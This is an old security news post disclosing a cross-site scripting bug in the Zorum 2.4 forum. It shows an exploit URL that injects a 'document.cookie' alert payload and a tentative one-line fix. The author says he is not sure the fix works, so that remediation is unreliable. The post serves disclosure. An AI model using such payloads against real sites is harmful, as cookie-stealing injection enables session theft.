Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » XSS bug in Zorum 2.4

XSS bug in Zorum 2.4

by Nikola Strahija on October 11th, 2002 Vulnerable systems: Zorum 2.4


Exploit:
z_user_show.php?method=showuserlink&class=javascript:alert
(document.cookie)
&rollid=admin&x=3da59a9da8825&

(without "*")

Solution:
i think that will work , but im not sure

open dbtreelistproperty_method.php and put this code in line 7:

$class = HTMLSpecialChars($class);

i'm a beginer php developer soooory :)

----------------------------------
Arab Vieruz


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »